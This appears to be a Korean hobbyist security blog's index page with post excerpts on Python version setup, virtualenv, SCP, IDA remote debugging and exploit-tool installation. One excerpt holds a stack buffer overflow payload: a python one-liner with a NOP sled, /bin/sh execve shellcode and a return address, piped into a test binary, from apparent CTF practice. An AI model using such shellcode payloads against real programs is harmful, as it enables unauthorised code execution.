만두만두

C:\Python27 에 설치되어 있는 python 2.7과 C:\Python37에 설치되어 있는 python 3.7를 같이 사용하고 싶었으나, 둘 모두 python.exe의 이름을 사용하고 있어 단순히 환경변수만 지정해준다고 해결되는 문제가 아니였다. pip는 pip와 pip3으로 이름을 다르게 설정해놨던데 exe도 따로 만들어놓았으면 참 좋았을듯. 해결방법으로 윈도우에서 mklink로 심볼릭 링크를 만들어 사용하는 방법이 있던데, 심볼릭 링크를 만들었으나, python2과 달리 python3에서는 python37.dll이 없다는 괴상한 오류가 뜨면서 내 정신머리도 오류가 생겨버렷다.. 전전긍긍하던 도중에, Windows 폴더에 py.exe 라는 다분히 python과 관계된 것 같은 파일을 발견했다. ..

cuckoo sandbox를 설치하면서 기존 존재하던 python 모듈들이 높아진 python 버전과 충돌을 발생시켜서 참 난감했었다. 이를 해결하기 위해서 몇 몇 자료들을 뒤져보니 마치 anaconda 처럼 독립적으로 분리된 python 환경을 만들어 해결하는 방법들을 알게되었다. python virtualenv라고 하는 이 모듈은 각 각의 어플리케이션에 따라 다른 python 환경을 제공해줌으로써, python 라이브러리의 차이에 발생하는 crash들을 사전에 방지할 수 있다. 설치 > pip install virtualenv # python 2> pip3 install virtualenv # python 3 사용법 python 2> python -m virtualenv [env name] # 현재 ..

(python -c 'print "\x90"*232 +"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "\xef\xbe\xad\xde" + "A"*4 + "\x04\xfa\xff\xbf"';cat)|./test요렇게 하면 안되는게 shellcode랑 0xdeadbeef랑 구분되게 해주지 않으면 0xdeadbeef 부분까지 code로 알아먹기 때문에 shellcode가 정상적으로 작동이 되지 않음. (python -c 'print "\x90"*222 +"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\..

우선 설치는 저번 포스팅을 참조하도록 합시당 (윈도우 상에서 설치합니다. scp는 리눅스에서 사용하는 프로토콜이므로 윈도우 상에서 scp 통신을 하려면 특별한 도구가 필요합니다.)http://chp747.tistory.com/129?category=716904 설치 뒤, 이러저러한 명령어들로 제대로 통신 환경이 구축됬는지 확인해봅시당.> ssh # scp는 ssh 프로토콜 기반의 통신이므로 제대로 설치되었는지 확인합니다.> scp # scp가 제대로 실행되는지 확인합니다.> dpkg -l | grep ssh # openssh-server 가 제대로 설치되었는지 확인합니다.> sudo service ssh start (혹은 restart) # ssh 서비스가 제대로 실행되고 있는지 실행해봅니다. ifcon..

윈도우 리눅스 간의 파일복사를 하기 위해서 scp를 사용하려 한다.scp는 Secure Copy Protocol 이라고 하는 로컬 호스트와 원격 호스트간의 안전한 파일 복사를 위한 프로토콜이다. ssh 프로토콜을 이용하여 안전하게 파일 복사를 수행할 수 있다. scp는 리눅스 상에서 사용되는 도구이기 때문에, 윈도우와 scp로 통신을 하려면 윈도우에서는 이 프로토콜을 변환해줄 특별한 도구가 필요하다. WinSCP라는 도구를 사용하여 윈도우 상에서도 리눅스와 scp 통신을 수행할 수 있다.https://winscp.net/download/WinSCP-5.13.1-Setup.exe위의 링크에서 설치파일을 다운로드 받을 수 있다. 윈도우 상에서는 그냥 설치 뒤, 리눅스의 로컬 ip 주소를 적어 접속하면 되는데..

The system is running in low-graphics mode 라는 창이 뜨고 뭐 이러저러한 경고 창들이 뜨면서 x-server 에 이상이 생겼었다. 스냅 샷이라는 최후의 수단이 있었지만, 작성한 페이로드들이 아까워서 다른 방법을 찾고 있었다...따흐흑 사용자 계정 명을 바꾸면서 생긴 문제같은데 > sudo sh -c 'echo "greeter-show-manual-login=true" >> /etc/lightdm/lightdm.conf'아무래도 이 명령어를 사용하다 문제가 발생한 것 같다. lightdm은 우분투에서 디스플레이를 담당하고 있는데, 내가 이걸 잘못 건드려서 GUI 환경 구현에 문제가 생긴 것으로 보인다. 참고 : https://wiki.ubuntu.com/LightDM 슬프..

IDA elf file debug IDA에서 elf 파일을 가상머신(guest OS)의 리눅스를 이용하여 디버깅 해 봅시담.먼저, IDA 폴더 안에 있는 server 파일을 게스트 OS에서 실행시켜야 합니다. IDA 설치 시 생성되는 폴더 안의 dbgsrv 디렉토리에 있는 linux_server 와 linux_server64 파일을 게스트 OS에 복사해줍니담. [복사]서버 파일을 실행시켜주면, 위와 같은 화면을 볼 수 있는뎅여 테스트로 64비트의 elf 파일을 디버깅 해 볼 것이니, linux_server64 파일을 실행시켜 줍니당 그 뒤 다른 터미널을 열든지 해서, ifconfig 명령어를 통해 게스트 OS의 IP를 알아냅니다. 제 OS에서는 192.168.92.128 이넵여 IDA로 돌아와서, 분석할..

서브라임 텍스트 설치. 공식 사이트 참고. https://www.sublimetext.com/docs/3/linux_repositories.html

libc database를 설치합시닷. > git clone https://github.com/niklasb/libc-database.git libc-database 폴더가 생기면 폴더로 들어가서, 먼저 > ./get 명령어를 이용해 라이브러리 database 를 업데이트 합니닷. 사용법 참고.http://kaspyx.tistory.com/86http://9oat.tistory.com/3

으아아아아아아아ㅏ아아ㅏㅏㅏㅏㅏㅏㅏㅏㅏㅏ 원가젯 겨우 설치햇다. ubuntu 16.04> sudo apt-get install software-properties-common> sudo apt-add-repository -y ppa:rael-gc/rvm> sudo apt-get update> sudo apt-get install rvm terminal 의 profile 설정에서 Run command as a login shell 해주고, 재부팅이나 로그아웃을 해준다. > rvm install ruby 루비까지 설치해주면 이제 gem을 사용할 수 있다! > gem install one_gadget 참고 : https://github.com/rvm/ubuntu_rvm [+] ubuntu 18.04이 시점에서는..